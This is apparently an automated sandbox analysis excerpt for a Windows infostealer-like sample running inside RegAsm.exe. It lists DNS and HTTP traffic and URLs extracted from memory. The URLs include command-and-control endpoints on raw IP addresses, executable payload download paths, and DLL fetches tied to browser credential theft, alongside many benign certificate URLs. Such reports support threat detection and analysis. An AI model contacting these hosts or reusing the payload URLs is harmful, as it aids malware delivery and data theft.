Source: global traffic	DNS traffic detected: DNS query: condedqpwqm.shop
Source: global traffic	DNS traffic detected: DNS query: t.me
Source: global traffic	DNS traffic detected: DNS query: stadiatechnologies.com

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: condedqpwqm.shop

Source: RegAsm.exe, 0000001D.00000002.1926386102.0000000000490000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1929039688.0000000000C7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66cf75d3791d7_vrewqgq.exe
Source: RegAsm.exe, 00000003.00000002.1411146244.00000000276C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66cf75d3791d7_vrewqgq.exeF
Source: RegAsm.exe, 00000003.00000002.1411146244.00000000276C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66cf75d3791d7_vrewqgq.exeT
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000C7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66cf75d3791d7_vrewqgq.exeX
Source: RegAsm.exe, 0000001D.00000002.1926386102.0000000000490000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66cf75d3791d7_vrewqgq.exem-data;
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000C10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1926386102.0000000000490000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1929039688.0000000000C7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66cf818156193_ldjfnsfd.exe
Source: RegAsm.exe, 0000001D.00000002.1926386102.0000000000490000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66cf818156193_ldjfnsfd.exe-data;
Source: RegAsm.exe, 0000001D.00000002.1926386102.0000000000490000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66cf818156193_ldjfnsfd.exe1kkkk1023589http://147.45.44.104/prog/66cf75d379
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000C7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66cf818156193_ldjfnsfd.exeY
Source: RegAsm.exe, 0000002E.00000002.2206607255.0000000000F98000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.2206607255.0000000000F3E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/
Source: RegAsm.exe, 0000002E.00000002.2206607255.0000000000F98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/4
Source: RegAsm.exe, 0000002E.00000002.2206607255.0000000000F98000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.2206607255.0000000000F3E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/8
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000C10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/F
Source: RegAsm.exe, 0000002E.00000002.2206607255.0000000000F3E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/R
Source: RegAsm.exe, 0000002E.00000002.2206607255.0000000000F3E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/Y
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000C10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/freebl3.dll
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000C10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/freebl3.dllxq
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000C10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/mozglue.dll
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000C10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/msvcp140.dll
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000C10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/msvcp140.dlllq
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/nss3.dll
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/nss3.dll&aQ~)
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000C10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/softokn3.dll
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000C10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/softokn3.dllPq
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/sql.dll
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/sql.dllna
Source: RegAsm.exe, 0000002E.00000002.2206607255.0000000000F3E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/sql.dllrrentVersion
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000BEF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1929039688.0000000000C7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/vcruntime140.dll
Source: RegAsm.exe, 0000002E.00000002.2206607255.0000000000F3E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/~
Source: RegAsm.exe, 0000002E.00000002.2205091531.000000000045A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.2205091531.00000000004CE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.2205091531.00000000005AF000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138:80
Source: RegAsm.exe, 0000002E.00000002.2205091531.00000000004B1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138:80IJ
Source: RegAsm.exe, 0000001D.00000002.1926386102.00000000004CE000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138:80JD
Source: RegAsm.exe, 0000002E.00000002.2205091531.00000000004B1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138:80JK
Source: RegAsm.exe, 0000002E.00000002.2205091531.000000000045A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.2205091531.00000000004CE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.2205091531.00000000005AF000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138:80e
Source: RegAsm.exe, 0000002E.00000002.2205091531.000000000045A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138:80exe
Source: RegAsm.exe, 0000002E.00000002.2205091531.00000000004B1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.2205091531.00000000004CE000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138:80fa20b20dvTLLjcqfGclHNCCYSAESCTrC.exe
Source: RegAsm.exe, 0000002E.00000002.2205091531.00000000004CE000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138:80ta
Source: RegAsm.exe, 00000003.00000002.1382432761.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109
Source: RegAsm.exe, 00000003.00000002.1384359989.0000000001451000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/
Source: RegAsm.exe, 00000003.00000002.1384359989.0000000001451000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/freebl3.dll
Source: RegAsm.exe, 00000003.00000002.1384359989.0000000001451000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/mozglue.dll
Source: RegAsm.exe, 00000003.00000002.1384359989.0000000001451000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/mozglue.dlli
Source: RegAsm.exe, 00000003.00000002.1384359989.0000000001451000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/msvcp140.dll
Source: RegAsm.exe, 00000003.00000002.1384359989.0000000001451000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/nss3.dll(
Source: RegAsm.exe, 00000003.00000002.1384359989.0000000001451000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/nss3.dlls
Source: RegAsm.exe, 00000003.00000002.1384359989.0000000001451000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/softokn3.dll#
Source: RegAsm.exe, 00000003.00000002.1384359989.0000000001451000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/softokn3.dll-
Source: RegAsm.exe, 00000003.00000002.1382432761.0000000000470000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1384359989.0000000001451000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/sqlite3.dll
Source: RegAsm.exe, 00000003.00000002.1384359989.0000000001451000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/sqlite3.dll_
Source: RegAsm.exe, 00000003.00000002.1384359989.000000000140A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/vcruntime140.dll
Source: RegAsm.exe, 00000003.00000002.1382432761.0000000000470000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1411146244.00000000276DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/c4754d4f680ead72.php
Source: RegAsm.exe, 00000003.00000002.1384359989.000000000140A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/c4754d4f680ead72.php:#
Source: RegAsm.exe, 00000003.00000002.1384359989.000000000140A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/c4754d4f680ead72.phpC
Source: RegAsm.exe, 00000003.00000002.1411146244.00000000276DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/c4754d4f680ead72.phpb
Source: RegAsm.exe, 00000003.00000002.1411146244.00000000276B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/c4754d4f680ead72.phpnu
Source: RegAsm.exe, 00000003.00000002.1382432761.00000000005AD000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/c4754d4f680ead72.phpry=----IDHIIJJJKEGIDGCBAFIJdefaultrelease
Source: RegAsm.exe, 00000003.00000002.1411146244.00000000276DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/c4754d4f680ead72.phpw
Source: RegAsm.exe, 00000003.00000002.1382432761.00000000005AD000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109KFCFBFIDdata;
Source: userIEHDAFHDHC.exe, 0000001B.00000002.1383374725.00000000038B5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1926386102.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://64532127VdtSrezylanAPHTGetSystemInfoGetSystemTimeSleepkernel32.dllSymMatchStringInternetSetOp
Source: file.exe, HDAFIIDAKJ.exe.29.dr, 66cf75d3791d7_vrewqgq[1].exe.3.dr, 66cf818156193_ldjfnsfd[1].exe.3.dr, userFBKFCFBFID.exe.3.dr, userIEHDAFHDHC.exe.3.dr, DHCGHDHIDH.exe.29.dr	String found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
Source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.3.dr, softokn3[1].dll.29.dr, freebl3.dll.3.dr, freebl3[1].dll.29.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.3.dr, softokn3[1].dll.29.dr, freebl3.dll.3.dr, freebl3[1].dll.29.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.3.dr, softokn3[1].dll.29.dr, freebl3.dll.3.dr, freebl3[1].dll.29.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: file.exe, HDAFIIDAKJ.exe.29.dr, 66cf75d3791d7_vrewqgq[1].exe.3.dr, 66cf818156193_ldjfnsfd[1].exe.3.dr, userFBKFCFBFID.exe.3.dr, userIEHDAFHDHC.exe.3.dr, DHCGHDHIDH.exe.29.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.3.dr, softokn3[1].dll.29.dr, freebl3.dll.3.dr, freebl3[1].dll.29.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, file.exe, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, HDAFIIDAKJ.exe.29.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, 66cf75d3791d7_vrewqgq[1].exe.3.dr, 66cf818156193_ldjfnsfd[1].exe.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, userFBKFCFBFID.exe.3.dr, userIEHDAFHDHC.exe.3.dr, mozglue.dll.3.dr, softokn3[1].dll.29.dr, DHCGHDHIDH.exe.29.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: file.exe, HDAFIIDAKJ.exe.29.dr, 66cf75d3791d7_vrewqgq[1].exe.3.dr, 66cf818156193_ldjfnsfd[1].exe.3.dr, userFBKFCFBFID.exe.3.dr, userIEHDAFHDHC.exe.3.dr, DHCGHDHIDH.exe.29.dr	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: file.exe, HDAFIIDAKJ.exe.29.dr, 66cf75d3791d7_vrewqgq[1].exe.3.dr, 66cf818156193_ldjfnsfd[1].exe.3.dr, userFBKFCFBFID.exe.3.dr, userIEHDAFHDHC.exe.3.dr, DHCGHDHIDH.exe.29.dr	String found in binary or memory: http://crl.entrust.net/ts1ca.crl0
Source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.3.dr, softokn3[1].dll.29.dr, freebl3.dll.3.dr, freebl3[1].dll.29.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.3.dr, softokn3[1].dll.29.dr, freebl3.dll.3.dr, freebl3[1].dll.29.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.3.dr, softokn3[1].dll.29.dr, freebl3.dll.3.dr, freebl3[1].dll.29.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, HDAFIIDAKJ.exe.29.dr, 66cf75d3791d7_vrewqgq[1].exe.3.dr, 66cf818156193_ldjfnsfd[1].exe.3.dr, userFBKFCFBFID.exe.3.dr, userIEHDAFHDHC.exe.3.dr, DHCGHDHIDH.exe.29.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.3.dr, softokn3[1].dll.29.dr, freebl3.dll.3.dr, freebl3[1].dll.29.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, file.exe, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, HDAFIIDAKJ.exe.29.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, 66cf75d3791d7_vrewqgq[1].exe.3.dr, 66cf818156193_ldjfnsfd[1].exe.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, userFBKFCFBFID.exe.3.dr, userIEHDAFHDHC.exe.3.dr, mozglue.dll.3.dr, softokn3[1].dll.29.dr, DHCGHDHIDH.exe.29.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.3.dr, softokn3[1].dll.29.dr, freebl3.dll.3.dr, freebl3[1].dll.29.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.3.dr, softokn3[1].dll.29.dr, freebl3.dll.3.dr, freebl3[1].dll.29.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.3.dr, softokn3[1].dll.29.dr, freebl3.dll.3.dr, freebl3[1].dll.29.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, HDAFIIDAKJ.exe.29.dr, 66cf75d3791d7_vrewqgq[1].exe.3.dr, 66cf818156193_ldjfnsfd[1].exe.3.dr, userFBKFCFBFID.exe.3.dr, userIEHDAFHDHC.exe.3.dr, DHCGHDHIDH.exe.29.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.3.dr, softokn3[1].dll.29.dr, freebl3.dll.3.dr, freebl3[1].dll.29.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, file.exe, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, HDAFIIDAKJ.exe.29.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, 66cf75d3791d7_vrewqgq[1].exe.3.dr, 66cf818156193_ldjfnsfd[1].exe.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, userFBKFCFBFID.exe.3.dr, userIEHDAFHDHC.exe.3.dr, mozglue.dll.3.dr, softokn3[1].dll.29.dr, DHCGHDHIDH.exe.29.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, file.exe, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, HDAFIIDAKJ.exe.29.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, 66cf75d3791d7_vrewqgq[1].exe.3.dr, 66cf818156193_ldjfnsfd[1].exe.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, userFBKFCFBFID.exe.3.dr, userIEHDAFHDHC.exe.3.dr, mozglue.dll.3.dr, softokn3[1].dll.29.dr, DHCGHDHIDH.exe.29.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.3.dr, softokn3[1].dll.29.dr, freebl3.dll.3.dr, freebl3[1].dll.29.dr	String found in binary or memory: http://ocsp.digicert.com0C
